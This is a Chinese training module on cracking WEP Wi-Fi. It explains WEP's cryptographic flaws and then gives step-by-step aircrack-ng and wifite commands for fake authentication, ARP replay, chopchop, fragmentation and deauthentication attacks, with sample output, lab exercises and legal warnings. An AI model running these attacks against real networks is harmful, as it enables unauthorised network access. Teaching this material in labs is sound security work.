================================================================================
  模块03：WEP破解
  学习目标：掌握WEP协议漏洞原理和完整破解流程
  所需工具：airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, wifite
================================================================================

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第一部分：WEP协议漏洞原理深度分析
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1.1 WEP加密过程回顾

  WEP(Wired Equivalent Privacy)加密流程：

  明文数据
      ↓
  ┌─────────────────────────────────────┐
  │ Step 1: 计算CRC-32完整性校验值(ICV)  │
  │ Step 2: 明文 + ICV  = 待加密数据    │
  │ Step 3: 生成密钥流: RC4(IV + WEP密钥)│
  │ Step 4: 密文 = 待加密数据 ⊕ 密钥流   │
  │ Step 5: 最终帧 = IV(明文) + 密文    │
  └─────────────────────────────────────┘

  WEP帧格式：
  ┌────────────┬──────────────┬───────────┬─────────────┐
  │ IV (3字节) │ KeyID(1位)   │ 密文      │ ICV(4字节)  │
  │ 明文传输！ │ 密钥编号     │           │ 明文+ICV 🔙 │
  └────────────┴──────────────┴───────────┴─────────────┘

1.2 WEP的核心缺陷

  缺陷一：IV空间太小
  • IV只有24位 → 16,777,216种可能值
  • 在活跃网络中，IV在数小时内就会重复
  • 相同的IV + 相同的WEP密钥 → 相同的密钥流
  • 相同的密钥流 → 可以通过XOR运算恢复明文

  缺陷二：RC4密钥调度弱点
  • RC4的KSA(Key Scheduling Algorithm)存在偏置
  • 某些RC4输出字节比其他字节出现概率更高
  • FMS攻击(Fluhrer, Mantin, Shamir)利用此弱点
  • PTW攻击(Pyshkin, Tews, Weinmann)进一步改进

  缺陷三：线性CRC-32校验
  • CRC-32是线性的 → 可以数学运算修改
  • 攻击者可以修改密文并重新计算正确的CRC
  • 这使得数据注入成为可能

  缺陷四：缺少密钥管理
  • 静态密钥：密钥从不自动更换
  • 所有客户端共享同一密钥
  • 没有认证机制(开放系统认证完全无效)

1.3 攻击原理总结

  ARP重放攻击(最常用)：
  ┌──────────────────────────────────────────────────────────────┐
  │ 攻击流程：                                                   │
  │ 1. 攻击者捕获一个ARP请求包(固定长度、易于识别)               │
  │ 2. 攻击者将ARP包重新注入到网络中(重放)                       │
  │ 3. AP收到ARP包后回复ARP应答                                  │
  │ 4. 每个ARP回复都有新的IV                                     │
  │ 5. 高速重放累计大量不同的IV                                  │
  │ 6. 收集5000-40000个IV后，使用统计攻击恢复密钥                │
  └──────────────────────────────────────────────────────────────┘

  为什么ARP包适合作重放？
  • ARP包长度固定(36字节或68字节)
  • ARP包头8字节(AA AA 03 00 00 00 08 06)固定可识别
  • 大量ARP包产生大量不同的IV
  • 对网络影响小，不易被察觉

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第二部分：aircrack-ng完整WEP破解流程
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

2.1 总体流程概览

  ┌─────────────┐   ┌──────────────┐   ┌──────────────┐   ┌─────────────┐
  │ Step 1      │   │ Step 2       │   │ Step 3       │   │ Step 4      │
  │ 启用监听    │ → │ 目标定向扫描 │ → │ ARP重放攻击  │ → │ 破解密钥    │
  │ airmon-ng   │   │ airodump-ng  │   │ aireplay-ng  │   │ aircrack-ng │
  └─────────────┘   └──────────────┘   └──────────────┘   └─────────────┘

2.2 详细步骤

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  步骤一：启用监听模式
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

  Step 1.1：杀死干扰进程
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo airmon-ng check kill                                 │
  └─────────────────────────────────────────────────────────────┘

  Step 1.2：启动监听模式
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo airmon-ng start wlan0                                │
  └─────────────────────────────────────────────────────────────┘

  Step 1.3：确认监听模式
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo iwconfig wlan0mon                                    │
  │ 输出应显示：Mode:Monitor                                    │
  └─────────────────────────────────────────────────────────────┘

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  步骤二：定向扫描目标WEP网络
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

  命令格式：
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo airodump-ng -c <信道> --bssid <AP的MAC> \            │
  │   -w wep_crack wlan0mon                                     │
  └─────────────────────────────────────────────────────────────┘

  参数详解：
  • -c 6：锁定信道6(使用目标AP实际信道)
  • --bssid AA:BB:CC:DD:EE:FF：指定目标AP的MAC地址
  • -w wep_crack：保存捕获数据到 wep_crack-01.cap
  • 定向扫描比全信道扫描更高效，不会丢失数据包

  示例完整命令：
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 \         │
  │   -w wep_crack wlan0mon                                     │
  └─────────────────────────────────────────────────────────────┘

  观察屏幕输出：
  ┌──────────────────────────────────────────────────────────────┐
  │ CH 6 ][ Elapsed: 30 s ][ 2025-01-01 12:00                    │
  │                                                               │
  │ BSSID              PWR RXQ Beacons #Data #/s CH ENC ESSID   │
  │ 00:14:6C:7E:40:80  -45 100    500   200   5  6 WEP WEP_Test │
  └──────────────────────────────────────────────────────────────┘

  注意保持此窗口打开，不要关闭！

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  步骤三：伪关联(Fake Authentication)
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

  为什么需要伪关联？
  • 大多数AP拒绝与未关联设备通信
  • 伪关联让AP认为我们是合法客户端
  • 成功后AP会接受我们注入的数据包

  命令格式：
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo aireplay-ng -1 0 -a <AP_MAC> wlan0mon                │
  └─────────────────────────────────────────────────────────────┘

  参数详解：
  • -1：伪关联攻击模式
  • 0：关联超时重试时间(秒)，0=无超时持续重试
  • -a AA:BB:CC:DD:EE:FF：目标AP的MAC地址
  • -e ESSID：(可选)指定目标网络名
  • -h 00:11:22:33:44:55：(可选)指定攻击者MAC(默认使用网卡MAC)

  执行示例：
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo aireplay-ng -1 0 -a 00:14:6C:7E:40:80 \              │
  │   -e WEP_Test wlan0mon                                      │
  └─────────────────────────────────────────────────────────────┘

  成功输出：
  ┌─────────────────────────────────────────────────────────────┐
  │ 12:00:30  Sending Authentication Request (Open System)      │
  │ 12:00:30  Authentication successful                         │
  │ 12:00:30  Sending Association Request                       │
  │ 12:00:30  Association successful :-) (AID: 1)               │
  └─────────────────────────────────────────────────────────────┘

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  步骤四：ARP请求重放攻击
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

  这是最核心的攻击步骤！

  命令格式：
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo aireplay-ng -3 -b <AP_MAC> -h <ATTACKER_MAC> wlan0mon│
  └─────────────────────────────────────────────────────────────┘

  参数详解：
  • -3：ARP请求重放攻击模式
  • -b AA:BB:CC:DD:EE:FF：目标AP的MAC地址
  • -h 00:11:22:33:44:55：(可选)指定攻击源MAC地址
  • -x <pps>：指定每秒发送包数(默认最高速度)
  • -x 500：限制每秒500包(推荐，避免AP崩溃)

  执行示例：
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 \                │
  │   -h 00:C0:CA:11:22:33 wlan0mon                             │
  └─────────────────────────────────────────────────────────────┘

  初始状态(ARP包积累阶段)：
  ┌─────────────────────────────────────────────────────────────┐
  │ 12:01:00  Waiting for beacon frame (BSSID: 00:14:6C:7E:40)  │
  │ 12:01:05  Read XXX packets...                               │
  │ 12:01:30  Read YYY packets... (got 0 ARP requests)...       │
  └─────────────────────────────────────────────────────────────┘

  当检测到ARP包时：
  ┌─────────────────────────────────────────────────────────────┐
  │ 12:02:00  Got ARP request packet from 00:22:33:44:55:66      │
  │ 12:02:01  Sent ARP packet (1)                               │
  │ 12:02:01  Got ARP request packet from ...                   │
  │ 12:02:02  Sent ARP packet (2)                               │
  │ 12:02:02  Got ARP request packet from ...                   │
  │ 12:02:03  Sent ARP packet (3)                               │
  │ ...                                                          │
  │ 发送速度越来越快！                                          │
  └─────────────────────────────────────────────────────────────┘

  速度优化技巧：
  • 如果有多个客户端，指定客户端MAC可能更快
  • 限制发送速率 -x 600 防止AP崩溃
  • 使用 -x 1024 可以最大化速度(如果AP不崩溃)

  回到airodump-ng窗口观察：
  • #Data列数值迅速增长 ← 关键指标！
  • 在5-10分钟内，#Data(即IV数)从几百增加到几万
  • 一般需要5000-40000个IV才能破解64位WEP
  • 128位WEP需要20000-80000个IV

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  步骤五：破解WEP密钥
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

  命令格式：
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo aircrack-ng wep_crack-01.cap                          │
  └─────────────────────────────────────────────────────────────┘

  参数详解：
  • wep_crack-01.cap：包含足够IV的捕获文件
  • -b BSSID：指定目标AP(如果文件包含多个AP)
  • -K：(可选)使用KoreK攻击替代PTW
  • -z：使用PTW攻击(默认)

  执行示例：
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo aircrack-ng wep_crack-01.cap                          │
  └─────────────────────────────────────────────────────────────┘

  运行过程：
  ┌─────────────────────────────────────────────────────────────┐
  │                              Aircrack-ng 1.7                │
  │                                                             │
  │      [00:00:00] Tested XXX keys (got 50000 IVs)             │
  │                                                             │
  │   KB    depth   byte(vote)                                   │
  │    0    2/  4   AE(45000) C1(38000) 3D(20000)               │
  │    1    0/  1   B8(80000) 2F(12000) 7A(8000)               │
  │    2    3/  4   CC(50000) 11(30000) 9B(15000)               │
  │    3    0/  1   1D(75000) A1(10000) 5E(9000)               │
  │    4    1/  3   A4(60000) 3E(25000) 88(10000)               │
  │                                                             │
  │            KEY FOUND! [ AE:B8:CC:1D:A4 ]                    │
  │      Decrypted correctly: 100%                              │
  └─────────────────────────────────────────────────────────────┘

  密钥格式：
  • 64位WEP：密钥为5字节(10个十六进制字符)，如 AE:B8:CC:1D:A4
  • 128位WEP：密钥为13字节(26个十六进制字符)
  • 也可以用ASCII密码，如 "MyWEPKey1234"

  如果IV不够：
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo aircrack-ng -z wep_crack-01.cap                      │
  │ (使用PTW攻击，需要的IV更少)                                 │
  └─────────────────────────────────────────────────────────────┘

2.3 备选攻击方式

  2.3.1 ChopChop攻击(当ARP重放不可用时)
  
  原理：解密单个数据包，获得密钥流

  ┌─────────────────────────────────────────────────────────────┐
  │ Step 1: 伪关联                                              │
  │ $ sudo aireplay-ng -1 0 -a 00:14:6C:7E:40:80 \              │
  │   -e WEP_Test wlan0mon                                      │
  │                                                             │
  │ Step 2: ChopChop攻击                                        │
  │ $ sudo aireplay-ng -4 -h 00:C0:CA:11:22:33 \                │
  │   -b 00:14:6C:7E:40:80 wlan0mon                             │
  │ 获得 .xor 密钥流文件                                        │
  │                                                             │
  │ Step 3: 生成数据包                                          │
  │ $ sudo packetforge-ng -0 -a 00:14:6C:7E:40:80 \             │
  │   -h 00:C0:CA:11:22:33 -k 255.255.255.255 \                │
  │   -l 255.255.255.255 -y fragment-0124-161700.xor \          │
  │   -w inject_packet                                          │
  │                                                             │
  │ Step 4: 注入生成的数据包                                    │
  │ $ sudo aireplay-ng -2 -r inject_packet wlan0mon             │
  └─────────────────────────────────────────────────────────────┘

  2.3.2 碎片攻击(Fragmentation Attack)

  原理：从AP获取PRGA(伪随机生成算法)字节流

  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo aireplay-ng -5 -b 00:14:6C:7E:40:80 \                │
  │   -h 00:C0:CA:11:22:33 wlan0mon                             │
  │                                                             │
  │ # 成功后生成 .xor 文件，然后和ChopChop一样使用              │
  └─────────────────────────────────────────────────────────────┘

  2.3.3 交互式包重放(针对特殊网络)

  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF \        │
  │   -b 00:14:6C:7E:40:80 -h 00:C0:CA:11:22:33 wlan0mon       │
  │                                                             │
  │ -p 0841 = 指定帧控制字段(Interactive模式)                   │
  │ -c FF:FF:FF:FF:FF:FF = 广播目标                            │
  └─────────────────────────────────────────────────────────────┘

2.4 WEP共享密钥认证绕过

  对于使用共享密钥认证(SKA)的WEP网络：

  SKA攻击原理：
  ┌──────────────────────────────────────────────────────────────┐
  │ SKA认证流程：                                                │
  │ 1. 客户端发送认证请求(算法=共享密钥)                        │
  │ 2. AP发送明文挑战文本(challenge)                             │
  │ 3. 客户端用WEP密钥加密挑战文本并返回                         │
  │ 4. AP验证并允许/拒绝                                         │
  │                                                              │
  │ 攻击方式：                                                   │
  │ - 捕获SK认证4帧，可以提取密钥流(挑战文本⊕密文=密钥流)       │
  │ - 有了密钥流就可以通过伪关联认证                             │
  └──────────────────────────────────────────────────────────────┘

  命令：
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 \         │
  │   -w ska_capture wlan0mon                                   │
  │                                                             │
  │ # 等待合法客户端执行SKA认证                                 │
  │ # 或使用aireplay-ng强制客户端断开重连                        │
  │                                                             │
  │ $ sudo aireplay-ng -0 5 -a 00:14:6C:7E:40:80 \              │
  │   -c CLIENT_MAC wlan0mon                                    │
  └─────────────────────────────────────────────────────────────┘

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第三部分：WEP破解自动化——wifite
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

3.1 wifite —— 一键WEP破解

  wifite自动化优势：
  • 全自动扫描、选择、攻击
  • 自动判断攻击策略
  • 自动管理接口
  • 支持多目标并发攻击

  基本命令：
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo wifite --wep                                         │
  └─────────────────────────────────────────────────────────────┘

  执行流程：
  ┌─────────────────────────────────────────────────────────────┐
  │ 1. 自动将网卡切换到监听模式                                 │
  │ 2. 扫描所有WiFi网络                                         │
  │ 3. 按信号强度排序                                           │
  │ 4. 显示WEP加密的目标列表                                    │
  │ 5. 等待用户选择目标(或自动选择)                             │
  │ 6. 执行完整的WEP破解流程：                                  │
  │    → aireplay-ng 伪关联                                     │
  │    → aireplay-ng ARP重放                                    │
  │    → aircrack-ng 破解                                       │
  │ 7. 显示破解结果                                              │
  └─────────────────────────────────────────────────────────────┘

  高级用法：
  ┌─────────────────────────────────────────────────────────────┐
  │ # 攻击所有WEP网络                                           │
  │ $ sudo wifite --wep --all                                   │
  │                                                             │
  │ # 指定目标（跳过扫描）                                      │
  │ $ sudo wifite --wep -b 00:14:6C:7E:40:80 -c 6              │
  │                                                             │
  │ # 详细输出                                                  │
  │ $ sudo wifite --wep -vv                                     │
  │                                                             │
  │ # 强制使用特定攻击方式                                      │
  │ $ sudo wifite --wep --arpreplay                             │
  │                                                             │
  │ # 使用自定义字典(字典不用于WEP但记录)                       │
  │ $ sudo wifite --wep --dict /path/to/wordlist.txt            │
  └─────────────────────────────────────────────────────────────┘

3.2 wifite参数速查表

  ┌─────────────────┬────────────────────────────────────────────┐
  │ 参数            │ 说明                                       │
  ├─────────────────┼────────────────────────────────────────────┤
  │ --wep           │ 仅攻击WEP网络(如果要WPA/WPS则不加此参数)  │
  │ --wpa           │ 仅攻击WPA/WPA2网络                         │
  │ --wps           │ 仅攻击启用WPS的网络                        │
  │ --all           │ 攻击所有发现的可攻击目标                   │
  │ -b <BSSID>      │ 指定目标BSSID                              │
  │ -c <channel>    │ 指定信道                                   │
  │ -e <ESSID>      │ 指定目标网络名称                           │
  │ --kill          │ 自动杀死干扰进程                           │
  │ -i <interface>  │ 指定无线接口                               │
  │ -pwr <dBm>      │ 最小信号强度阈值                           │
  │ --pmkid         │ 启用PMKID攻击                              │
  │ -vv             │ 详细输出模式                               │
  │ --no-pmkid      │ 禁用PMKID攻击                              │
  └─────────────────┴────────────────────────────────────────────┘

  保留破解结果：
  • 默认存在 /usr/share/wifite/ 或当前目录
  • 包含 .cap 文件(捕获的握手包)
  • 包含 .txt 文件(破解出的密码)
  • 包含 .csv 文件(WPA密码Hash)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第四部分：综合实践
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

实践目标：在已搭建WEP测试环境中完成完整的WEP破解流程

══════════════════════════════════════════════════════════════════
  实践 3-1：在实验环境搭建WEP测试AP
══════════════════════════════════════════════════════════════════

注意：此步骤需要另一台设备或路由器设置WEP
      使用旧路由器或树莓派即可
      如果无WEP设备，用hostapd模拟

  使用hostapd模拟WEP AP：
  ┌─────────────────────────────────────────────────────────────┐
  │ $ cat > /tmp/hostapd_wep.conf << 'EOF'                      │
  │ interface=wlan1                                             │
  │ driver=nl80211                                              │
  │ ssid=WEP_Test_Lab                                           │
  │ hw_mode=g                                                   │
  │ channel=6                                                   │
  │ macaddr_acl=0                                               │
  │ auth_algs=2                                                 │
  │ wep_default_key=0                                           │
  │ wep_key0="abcdeabcdeabcdeabcdeabcde12"                      │
  │ wep_key_len_broadcast=13                                    │
  │ wep_key_len_unicast=13                                      │
  │ EOF                                                         │
  │                                                             │
  │ $ sudo hostapd /tmp/hostapd_wep.conf                        │
  └─────────────────────────────────────────────────────────────┘

  ⚠ 不要使用自己的主路由器！请准备专门的测试AP

══════════════════════════════════════════════════════════════════
  实践 3-2：手动完整WEP破解流程
══════════════════════════════════════════════════════════════════

Step 1：杀死干扰进程
  终端输入：sudo airmon-ng check kill

Step 2：启动监听模式
  终端输入：sudo airmon-ng start wlan0
  验证：iwconfig wlan0mon → Mode:Monitor

Step 3：扫描WEP网络
  终端输入：sudo airodump-ng wlan0mon
  查找ENC列显示"WEP"的目标
  记录BSSID和信道
  按Ctrl+C停止

Step 4：定向扫描(替换成你的目标信息)
  终端输入：sudo airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 \
              -w wep_crack wlan0mon
  保持此窗口打开！新开终端继续后续步骤

Step 5：伪关联(新终端窗口)
  终端输入：sudo aireplay-ng -1 0 -a 00:14:6C:7E:40:80 \
              -e WEP_Test_Lab wlan0mon
  验证输出：Association successful

Step 6：ARP重放攻击(新终端窗口)
  终端输入：sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 \
              -h YOUR_MAC wlan0mon
  观察输出中是否有 "Got ARP request" 然后开始重放
  回到Step 4窗口，观察 #Data 列的增长

Step 7：等待IV收集
  64位WEP：等待#Data达到约 5000+
  128位WEP：等待#Data达到约 20000+

Step 8：破解密钥
  终端输入：sudo aircrack-ng wep_crack-01.cap
  如果IV不够，等待更多数据后再试
  如果成功，输出 "KEY FOUND!" 并显示十六进制密钥

Step 9：验证密钥
  可以尝试用破解出的密钥连接目标网络

══════════════════════════════════════════════════════════════════
  实践 3-3：wifite自动化WEP破解
══════════════════════════════════════════════════════════════════

Step 1：启动wifite
  终端输入：sudo wifite --wep

Step 2：观察自动扫描
  等待1-2分钟直到扫描完成

Step 3：选择目标
  wifite会列出WEP目标，(按序号选择)
  或使用 --all 攻击所有目标

Step 4：等待自动破解
  wifite自动执行：
  → 伪关联
  → ARP重放
  → 破解

Step 5：查看结果
  wifite会在终端显示破解成功的密钥

Step 6：对比手动与自动
  • 手动流程给了你更多控制
  • 自动流程更省时省力
  • 理解手动流程对排错很重要

══════════════════════════════════════════════════════════════════
  实践 3-4：多网卡攻击(进阶)
══════════════════════════════════════════════════════════════════

  如果有两张无线网卡：
  ┌─────────────────────────────────────────────────────────────┐
  │ 网卡1(wlan0mon)：执行aireplay-ng ARP重放                    │
  │ 网卡2(wlan1mon)：执行airodump-ng定向捕获                    │
  └─────────────────────────────────────────────────────────────┘

  好处：
  • 不会因为监听信道跳转而丢失数据包
  • 可以同时从多个角度捕获
  • 破解效率更高

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第五部分：故障排除
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

5.1 常见问题和解决方案

  问题：伪关联失败
  ┌─────────────────────────────────────────────────────────────┐
  │ 原因1：AP使用MAC地址过滤                                   │
  │ 解决：等待合法客户端，复制其MAC地址                          │
  │ 原因2：AP使用共享密钥认证(SKA)                              │
  │ 解决：捕获SKA过程获取密钥流                                 │
  │ 原因3：距离太远，信号太弱                                   │
  │ 解决：靠近AP                                                │
  └─────────────────────────────────────────────────────────────┘

  问题：ARP重放无效果(#Data不增长)
  ┌─────────────────────────────────────────────────────────────┐
  │ 原因1：没有客户端活跃(A RP请求来自客户端)                  │
  │ 解决：使用deauth强制客户端断开重连                           │
  │ 原因2：伪关联未成功                                         │
  │ 解决：重新执行伪关联                                        │
  │ 原因3：网卡不支持注入                                       │
  │ 解决：使用aireplay-ng -9 测试注入能力                        │
  └─────────────────────────────────────────────────────────────┘

  问题：注入测试命令
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo aireplay-ng -9 wlan0mon                              │
  │ 检查输出中"Injection is working!"的行                       │
  │ $ sudo aireplay-ng -9 -a <BSSID> wlan0mon                   │
  │ 针对特定AP测试                                              │
  └─────────────────────────────────────────────────────────────┘

  问题：airodump-ng显示固定信道无法修改
  ┌─────────────────────────────────────────────────────────────┐
  │ $ sudo iwconfig wlan0mon channel 6                          │
  │ # 或                                                         │
  │ $ sudo iw dev wlan0mon set channel 6                        │
  └─────────────────────────────────────────────────────────────┘

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
第六部分：注意事项
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠ 法律警告
  • WEP破解仅在教学实验环境合法
  • 在中国，破解他人WiFi密码违反《网络安全法》和《刑法》
  • 未经授权获取他人网络访问权限可构成"非法获取计算机信息系统数据罪"
  • 本教程仅用于信息安全教育和授权测试

⚠ 伦理考量
  • 即使技术上可以破解，不代表应该破解
  • WEP已淘汰，现实中极其罕见
  • 学习WEP破解是为了理解根本的安全概念
  • 这些概念(WEP的缺陷)直接推动了WPA/WPA2的诞生
  • 理解WEP的失败是理解现代无线安全的基础

⚠ 技术注意
  • ARP重放攻击会产生大量无线流量，可能干扰周边网络
  • 部分AP在大量ARP注入后会崩溃重启
  • 长期攻击中网卡可能过热
  • 收集IV注意清理(pcap文件可能很大，几GB)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
课后练习
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1. 用自己的语言解释WEP的RC4密钥流重复问题
2. 手动完成一次完整的WEP破解(从扫描到密钥获取)
3. 破解后使用airdecap-ng解密捕获的WEP加密流量
4. 对比不同IV数量下的破解时间(1000 IV vs 10000 IV vs 50000 IV)
5. 研究ChopChop攻击作为ARP重放的替代方案
6. 实验ARP重放速率对破解速度的影响(不同-x值)
7. 用Wireshark分析WEP帧结构，识别IV和密文部分

================================================================================
  模块03结束 — 经典WEP攻击是理解无线安全漏洞的启蒙课
================================================================================
